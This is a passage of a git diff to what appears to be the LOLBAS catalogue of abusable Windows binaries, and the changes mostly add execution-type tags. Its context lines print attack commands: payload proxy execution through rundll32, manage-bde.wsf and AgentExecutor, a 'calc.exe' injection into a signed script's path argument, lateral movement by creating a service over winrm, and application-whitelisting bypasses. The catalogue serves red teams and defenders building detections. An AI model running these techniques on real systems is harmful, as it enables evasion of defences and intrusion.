MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta
Description: Launch a HTML application payload by calling FileProtocolHandler. Description: Launch a HTML application payload by calling FileProtocolHandler.
Usecase: Invoke an HTML Application via mshta.exe (Default Handler). Usecase: Invoke an HTML Application via mshta.exe (Default Handler).
@ -46,6 +56,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: HTA
Full_Path: Full_Path:
- Path: c:\windows\system32\url.dll - Path: c:\windows\system32\url.dll
- Path: c:\windows\syswow64\url.dll - Path: c:\windows\syswow64\url.dll

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
Description: Launch an executable payload by calling RouteTheCall (obfuscated). Description: Launch an executable payload by calling RouteTheCall (obfuscated).
Usecase: Launch an executable. Usecase: Launch an executable.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path: Full_Path:
- Path: c:\windows\system32\zipfldr.dll - Path: c:\windows\system32\zipfldr.dll
- Path: c:\windows\syswow64\zipfldr.dll - Path: c:\windows\syswow64\zipfldr.dll

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
Tags: Tags:
- Execute: DLL - Execute: DLL (.NET)
Full_Path: Full_Path:
- Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
Code_Sample: Code_Sample:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags:
- Execute: PowerShell
Full_Path: Full_Path:
- Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
- Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags:
- Execute: CMD
Full_Path: Full_Path:
- Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 - Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
- Path: C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: 'powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsInstallationPath "/../../../../../; calc.exe ;"' - Command: 'powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsInstallationPath "/../../../../../; calc.exe ;"'
Description: Execute binaries and commands from the context of the signed script using the "VsInstallationPath" flag. Description: Execute binaries and commands from the context of the signed script using the "VsInstallationPath" flag.
Usecase: Proxy execution Usecase: Proxy execution
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\Tools\Launch-VsDevShell.ps1 - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\Tools\Launch-VsDevShell.ps1
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\Tools\Launch-VsDevShell.ps1 - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\Tools\Launch-VsDevShell.ps1

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf - Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf
Description: Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file. Description: Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file.
Usecase: Proxy execution from script Usecase: Proxy execution from script
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path: Full_Path:
- Path: C:\Windows\System32\manage-bde.wsf - Path: C:\Windows\System32\manage-bde.wsf
Code_Sample: Code_Sample:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1216.001 MitreID: T1216.001
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags:
- Execute: SCT
Full_Path: Full_Path:
- Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs - Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
- Path: C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs - Path: C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1216.002 MitreID: T1216.002
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: PowerShell
Full_Path: Full_Path:
- Path: C:\Windows\System32\SyncAppvPublishingServer.vbs - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs
Detection: Detection:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
Tags: Tags:
- Execute: DLL - Execute: DLL (.NET)
Full_Path: Full_Path:
- Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
Code_Sample: Code_Sample:

View File

@ -11,6 +11,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
- Execute: Remote
- Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985'
Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol
Usecase: Proxy execution Usecase: Proxy execution
@ -18,6 +21,9 @@ Commands:
Privileges: Admin Privileges: Admin
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
- Execute: Remote
- Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty' - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty'
Description: Bypass AWL solutions by copying cscript.exe to an attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe. Description: Bypass AWL solutions by copying cscript.exe to an attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe.
Usecase: Execute arbitrary, unsigned code via XSL script Usecase: Execute arbitrary, unsigned code via XSL script
@ -25,6 +31,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1220 MitreID: T1220
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: XSL
Full_Path: Full_Path:
- Path: C:\Windows\System32\winrm.vbs - Path: C:\Windows\System32\winrm.vbs
- Path: C:\Windows\SysWOW64\winrm.vbs - Path: C:\Windows\SysWOW64\winrm.vbs

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: Pester.bat ;calc.exe - Command: Pester.bat ;calc.exe
Description: Execute code using Pester. Example here executes calc.exe Description: Execute code using Pester. Example here executes calc.exe
Usecase: Proxy execution Usecase: Proxy execution
@ -18,13 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
- Command: Pester.bat ;calc.exe Tags:
Description: Execute code using Pester. Example here executes calc.exe - Execute: EXE
Usecase: Proxy execution
Category: Execute
Privileges: User
MitreID: T1216
OperatingSystem: Windows 10, Windows 11
Full_Path: Full_Path:
- Path: c:\Program Files\WindowsPowerShell\Modules\Pester\<version>\bin\Pester.bat - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\<version>\bin\Pester.bat
Code_Sample: Code_Sample:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags: Tags:
- Execute: DLL - Execute: DLL (.NET)
- Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll - Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll
Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name. Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
Usecase: Local execution of managed code to bypass AppLocker. Usecase: Local execution of managed code to bypass AppLocker.
@ -21,7 +21,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags: Tags:
- Execute: DLL - Execute: DLL (.NET)
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe

View File

@ -18,6 +18,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: All Windows OperatingSystem: All Windows
Tags:
- Execute: CMD
- Command: adplus.exe -c config-adplus.xml - Command: adplus.exe -c config-adplus.xml
Description: Dump process memory using adplus config file (see Resources section for a sample file). Description: Dump process memory using adplus config file (see Resources section for a sample file).
Usecase: Run commands under a trusted Microsoft signed binary Usecase: Run commands under a trusted Microsoft signed binary
@ -32,6 +34,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: All windows OperatingSystem: All windows
Tags:
- Execute: CMD
- Execute: EXE
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags:
- Execute: PowerShell
- Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1 - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1
Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully
Usecase: Execute a provided EXE Usecase: Execute a provided EXE
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags:
- Execute: EXE
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Microsoft Intune Management Extension\AgentExecutor.exe - Path: C:\Program Files (x86)\Microsoft Intune Management Extension\AgentExecutor.exe
Code_Sample: Code_Sample:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: Administrator Privileges: Administrator
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: EXE
- Command: appcert.exe test -apptype desktop -setuppath c:\users\public\malicious.msi -setupcommandline /q -reportoutputpath c:\users\public\output.xml - Command: appcert.exe test -apptype desktop -setuppath c:\users\public\malicious.msi -setupcommandline /q -reportoutputpath c:\users\public\output.xml
Description: Install an MSI file via an msiexec instance spawned via appcert.exe as parent process. Description: Install an MSI file via an msiexec instance spawned via appcert.exe as parent process.
Usecase: Execute custom made MSI file with malicious code Usecase: Execute custom made MSI file with malicious code
@ -18,6 +20,8 @@ Commands:
Privileges: Administrator Privileges: Administrator
MitreID: T1218.007 MitreID: T1218.007
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: MSI
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\App Certification Kit\appcert.exe - Path: C:\Program Files (x86)\Windows Kits\10\App Certification Kit\appcert.exe
- Path: C:\Program Files\Windows Kits\10\App Certification Kit\appcert.exe - Path: C:\Program Files\Windows Kits\10\App Certification Kit\appcert.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10 w/Office 2016 OperatingSystem: Windows 10 w/Office 2016
Tags:
- Execute: CMD
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)" - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10 w/Office 2016 OperatingSystem: Windows 10 w/Office 2016
Tags:
- Execute: EXE
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')" - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
@ -25,6 +29,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10 w/Office 2016 OperatingSystem: Windows 10 w/Office 2016
Tags:
- Execute: EXE
Full_Path: Full_Path:
- Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe - Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
- Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe - Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe

View File

@ -49,6 +49,7 @@ Commands:
OperatingSystem: Windows OperatingSystem: Windows
Tags: Tags:
- Execute: WSH - Execute: WSH
- Execute: Remote
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript Usecase: Remote execution of VBScript
Description: This style of execution may not longer work due to patch. Description: This style of execution may not longer work due to patch.
@ -58,6 +59,7 @@ Commands:
OperatingSystem: Windows OperatingSystem: Windows
Tags: Tags:
- Execute: WSH - Execute: WSH
- Execute: Remote
Full_Path: Full_Path:
- Path: no default - Path: no default
Detection: Detection:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: Shellcode
- Command: | - Command: |
cdb.exe -pd -pn <process_name> cdb.exe -pd -pn <process_name>
.shell <cmd> .shell <cmd>
@ -20,6 +22,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: CMD
- Command: cdb.exe -c C:\debug-script.txt calc - Command: cdb.exe -c C:\debug-script.txt calc
Description: Execute arbitrary commands and binaries using a debugging script (see Resources section for a sample file). Description: Execute arbitrary commands and binaries using a debugging script (see Resources section for a sample file).
Usecase: Run commands under a trusted Microsoft signed binary Usecase: Run commands under a trusted Microsoft signed binary
@ -27,6 +31,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: CMD
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe

View File

@ -20,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1055 MitreID: T1055
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: DLL
- Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name - Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name
Description: Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions. Description: Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions.
Usecase: Execute DLL code Usecase: Execute DLL code

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: CSharp
Full_Path: Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
- Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe - Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: CMD
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe - Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe
Code_Sample: Code_Sample:

Some files were not shown because too many files have changed in this diff Show More